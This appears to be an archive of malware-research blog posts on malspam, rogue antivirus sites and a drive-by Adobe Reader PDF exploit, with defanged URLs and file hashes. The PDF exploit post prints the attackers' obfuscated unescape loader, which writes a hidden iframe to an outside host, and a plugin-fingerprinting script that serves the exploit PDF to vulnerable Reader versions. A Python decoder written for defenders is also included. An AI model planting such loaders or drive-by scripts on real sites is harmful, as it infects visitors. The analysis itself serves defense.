Archive for the 'MalSpam' Category

19 Nov

Fake Activation and Mailing List Unsubscribe Websites

In the past few days I’ve seen many websites pop up pretending to be mailing-list unsubscription sites. As usual, these sites use legitimate-sounding names like antivirus-activation-code1.org or online-activation-code.info.

[Screenshot: example of one of the fake unsubscribe pages.]

STAY AWAY from these: in reality they are being used to harvest e-mail addresses, most likely for future spam campaigns. I also suspect these domains are part of the current fake XP activation spam campaign.

Domains involved:


BE ADVISED: These sites may still be active, be careful!

–mwdisector

25 Sep

SpamNuker

Note: This site is distributing a rogue (“fake”) anti-spam product that is itself malware. Do not visit, pay, or download the software discussed below.


Site: hxxp://spamnuker.com/

File: OutlookSpamNukerInstaller.exe
VirusTotal: Result 14/36 (38.89%)

File size: 29280 bytes
MD5: 463de2ba97b8effef4b72430de51553b
SHA1: 1eb9f02c925ef27c5e6a1086cb0c6c798c208eaf
SHA256: 7700a3c6a95ed1bb2dfb21567818c7bce55a5d178b28cc9040c528d7045f72eb
SHA512: b52f87db3390ecd2cd5726c3833c07a224d9c718cc8d4a421faef5f66d3f3a2625d1a92c7bf288f67e4fba9f1fd63c40fd05b76ea85b149d6019a6a17e428bce
PEiD: -
TrID file type identification:
Windows Screen Saver (39.4%)
Win32 Executable Generic (25.6%)
Win32 Dynamic Link Library (generic) (22.8%)
Generic Win/DOS Executable (6.0%)
DOS Executable Generic (6.0%)

16 Sep

Virus Response Lab 2009

Note: This site is distributing a rogue (“fake”) anti-malware product that is itself malware. Do not visit, pay, or download the software discussed below.


Site: hxxp://viruslabs2009.com/

File: virlab_install.exe
VirusTotal: Result: 9/36 (25%)
File size: 1579973 bytes
MD5: 93fef280425ad6fb002430abb8cf216d
SHA1: 766a414faa1e062c0ce40f1ede93a3d166902b6c
SHA256: 4346309f29aacf14cd0fc764ccac674572a498b7f80e1a4018265008cbf1ba4c
SHA512: 371d231b30c32756be1dbd5b50e26144d506abe895a6893fdcea866b8353e3108548ded05366e25c2d968dffa506880e8729b7b8a6b4f4e06c3814d903eba37e
PEiD: -
TrID file type identification:
Win64 Executable Generic (59.6%)
Win32 Executable MS Visual C++ (generic) (26.2%)
Win32 Executable Generic (5.9%)
Win32 Dynamic Link Library (generic) (5.2%)
Generic Win/DOS Executable (1.3%)

MDB: /stingner-malware/

Removal:

Remove this threat with MalwareBytes!

07 Sep

Malspam: Notices from IRS (taxform_for_print.scr)

Here is a piece of malspam we received that purports to be from the IRS, telling you that you are due a refund. The one we got was from taxinform32@taxreducers.com. Simply follow the steps below and the money is yours! (Proceed at your own risk. File available in /pnuemo-malware/.)

Get Your Refund $1927.10 in Just 3 Easy Steps:
1. Print and fill a short tax interview (click to download)
2. Send it online
3. Receive your tax refund

The link included takes you to the following address and file: hxxp://freepromo.cn/documents/taxform_for_print.scr

taxform_for_print.scr
VirusTotal result: 7/36 (19.45%)
MD5: a705a1df1fc36f696f0eb0fea72870d3
Reports: VirusTotal, ThreatExpert Analysis

31 Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

The user visits hxxp://120.50.46.90/~admin/tps/index.php, which includes the following obfuscated code:

<script language="javascript">document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66%72%61%6D%65%3E'));</script>

When deobfuscated, this becomes:

<iframe src="http://69.46.27.41/afxv/tpv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
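A defender-side decoder for this loader pattern, added here as an example (it is not code from the original post): it decodes every document.write(unescape(...)) payload in a page and flags the 1x1 or invisible iframes such payloads write. The sample page is constructed and points at a TEST-NET address rather than the real host; the function and constant names are my own.

```python
import re
from urllib.parse import unquote

# Constructed sample: the same document.write(unescape(...)) loader technique
# as the page quoted in the post, but pointing at a TEST-NET address (not the
# real malware host). The attacker-style encoding percent-encodes every byte.
_HIDDEN_IFRAME = ('<iframe src="http://192.0.2.10/afxv/tpv/index.php" width=1 height=1 '
                  'style="visibility:hidden;position:absolute"></iframe>')
_ESCAPED = "".join("%%%02X" % ord(ch) for ch in _HIDDEN_IFRAME)
SAMPLE_PAGE = ('<html><body><p>Welcome</p>\n<script language="javascript">'
               "document.write(unescape('" + _ESCAPED + "'));</script>\n</body></html>")

UNESCAPE_RE = re.compile(r"""unescape\(\s*(['"])(.*?)\1\s*\)""", re.S)
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")


def decode_unescape_calls(page: str) -> list:
    """Decode the argument of every unescape('%XX...') call in the page.
    JS unescape() also accepts %uXXXX, which urllib's unquote does not."""
    decoded = []
    for m in UNESCAPE_RE.finditer(page):
        raw = re.sub(r"%u([0-9a-fA-F]{4})", lambda u: chr(int(u.group(1), 16)), m.group(2))
        decoded.append(unquote(raw))
    return decoded


def find_hidden_iframes(markup: str) -> list:
    """Flag iframes that are 1x1 or styled invisible, as the decoded loader's is."""
    hits = []
    for m in IFRAME_RE.finditer(markup):
        attrs = {k.lower(): (dq or sq or bare) for k, dq, sq, bare in ATTR_RE.findall(m.group(1))}
        style = attrs.get("style", "").replace(" ", "").lower()
        tiny = attrs.get("width") == "1" and attrs.get("height") == "1"
        invisible = "visibility:hidden" in style or "display:none" in style
        if tiny or invisible:
            hits.append({"src": attrs.get("src", ""), "tiny": tiny, "invisible": invisible})
    return hits


def scan_page(page: str) -> list:
    """Hidden iframes written by any unescape() payload found in the page."""
    return [h for d in decode_unescape_calls(page) for h in find_hidden_iframes(d)]


if __name__ == "__main__":
    for hit in scan_page(SAMPLE_PAGE):
        print(hit)
```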

We can see the hidden iframe above, and the page includes the following code:

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
  // Pull the version number out of the Adobe Acrobat/Reader plug-in description
  re=/.d.{2}e.A.{2}o.....l..-.+?([0-9]+.[0-9]+)/;
  if(res=re.exec(navigator.plugins[i].description))
  {
    ppdf=res[1];
  }
  // Likewise for the Shockwave Flash plug-in (collected, but not used below)
  var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
  var res;
  if(res=re.exec(navigator.plugins[i].description))
  {
    flash=res[1]+'.'+res[2]+'.'+res[3];
  }
}
ppdfenable=0;
if(ppdf!=0)
{
  ppdfenable=0;
  // Strip non-digits ("7.0.9" becomes "709"); the PDF is served only to Reader 7.0.x or older
  ppdf=ppdf.replace(/\D/g,"");
  if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
  if(ppdf[0]<7)ppdfenable=1;
  if(ppdfenable)
  {
    document.write('<iframe width=1 height=1 src="hxxp://69.46.27.41/afxv/tpv/gnu.pdf"></iframe>');
  }
}
</script>

This leads us to the PDF in question, located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. It is also available in /pnuemo-malware/.

gnu.pdf
VirusTotal result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
Report: VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
VirusTotal result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
Report: VirusTotal
Hosted at:
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

27 Aug

YouTube Message Malspam

I received this in my inbox today: an e-mail claiming to be from YouTube and saying that someone had sent me a message. The URL in the message takes the user through two redirects and then prompts the user to download a file. This file is malware and currently has a low detection rate. Here is the information I’ve gathered. All of the URLs below are still live, so proceed at your own risk.


hxxp://zz.gd/1d7d6a
 -> hxxp://sghghdfgh.actionpooses.com/dfhgfhgfh
 --> hxxp://actionpooses.com/livenow/live-now.htm
 ---> hxxp://212.179.35.9/Free-Girls-Cams-Viewer.exe

Free-Girls-Cams-Viewer.exe
VirusTotal result: 6/36 (16.67%)
MD5: 716adbf47c6fffbd77604be9e9dd7043
Reports: VirusTotal, ThreatExpert Analysis

18 Aug

“Weekly top news” (new)

In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of “Weekly top news”, with the sender’s name “Top News Agency”:


The content of the e-mail purports to link to a number of “breaking” news items and “shocking” videos:


The infected sites look rather plain (no images from real news sites) with another false video embed and “ActiveX Object Error”:


Funnily enough, clicking on the “Close this page” button at the top attempts to redirect to hxxp://79.135.167.18/antivirus, but due to a bit of a coding error on the part of the bad guys/gals, it looks like they only appended that URL to the existing one, i.e. hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus, yielding a 404:


Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven’t finished their virus scan! GASP!


The dropper looks to be very similar to the ones we’ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. It is served under two different filenames, scaner.exe [sic] and install.exe. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we’ve seen so far, this one’s going to download “Antivirus XP 2008” again, so nothing new there, either.

SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca

15 Aug

CNN & MSNBC Attack - Where is it all coming from?

My e-mail inbox has been flooded since breaking the CNN malspam story. Everyone wants to know where this attack is coming from and how it’s releasing itself into the wild so quickly. I’m sorry to say that I do not have the answer yet… but I do have a hypothesis.

I believe the attack is exploited 100% through hacked/infected computers. We know that the e-mails are being distributed by infected computers, as we can tell from the e-mail headers: most of the e-mails come from private ADSL or cable lines. One question remains: how are the websites getting owned? Take a second to consider the following possibility…

I own domain.com and I don’t know a whole lot about HTML. I want a flashy website so I go out and buy “Build Your Own Website Software 1.0”. This type of software has several useful features such as a WYSIWYG editor, scripts, images, templates, and automatic FTP upload features.

If my machine is infected with malware, it will most definitely search for FTP credentials. If the hackers spent long enough harvesting FTP credentials, all they need to do is write software to upload their malicious pages to each site and then direct their botnet to start spamming the links at the same time.

Let’s look at one of the e-mails we received:
Header:

Received: from *.adsl.alicedsl.de (*.adsl.alicedsl.de [78.4*.15*.28*])

This header shows us that the mail was sent from a private ADSL line under the .de TLD.

Body:

Girl trains monkey to give tongue service video hxxp://download.german-railroads.eu/start.html

The body of the e-mail contains a link to a German railroads site. Is this a coincidence?

I feel that my hypothesis is fairly obvious but I have not seen much speculation about the attack vector and I would like some input from our readers. What do you think?

If anyone reading this post has had their website compromised by this attack, please contact me at lithium@malwaredatabase.net as I would like to perform a post-mortem analysis to identify the attack vector.

13 Aug

“msnbc.com - BREAKING NEWS” (update)

The content of the infected sites has changed, now accurately imitating MSNBC sites:


Additionally, the downloader, adobe_flash.exe, appears to be slightly different, as a new checksum is represented:

SHA256(adobe_flash.exe)= 2fb8a4ecb561475b52883b535ce9810e6021ebe666e16e89cbbc86018d153547

Analysis to come.

13 Aug

“msnbc.com - BREAKING NEWS” (new)

It looks like a campaign has begun, similar to the fake CNN alerts, using MSNBC “Breaking News” notification e-mails:

Updated Subject Lines:

  • msnbc.com - BREAKING NEWS: Time Warner sells AOL
  • msnbc.com - BREAKING NEWS: How to save money on gas
  • msnbc.com - BREAKING NEWS: Americans loves to sue people
  • msnbc.com - BREAKING NEWS: Millions of credic card numbers stolen from bank database, find out if you are affected
  • msnbc.com -BREAKING NEWS: Mary-Kate Olsen implicated in Heath Ledger’s death


The hyperlink purporting to be hxxp://breakingnews.msnbc.com actually points to the malicious domain, wherein is hosted what appears to be the same content as the fake CNN campaign:


Just like before, the content of the infected site/page is replete with plenty of escaped text waiting to be decoded by a document.write(unescape…) call down near the bottom. The downloader, adobe_flash.exe, appears to be the same one used in the CNN-oriented campaign. Looks like they’re not changing much.

SHA256(adobe_flash.exe)= a629c6ea28327a467e666a2a7d5a5ccc3194858b2217f608431b98dff268c2d9
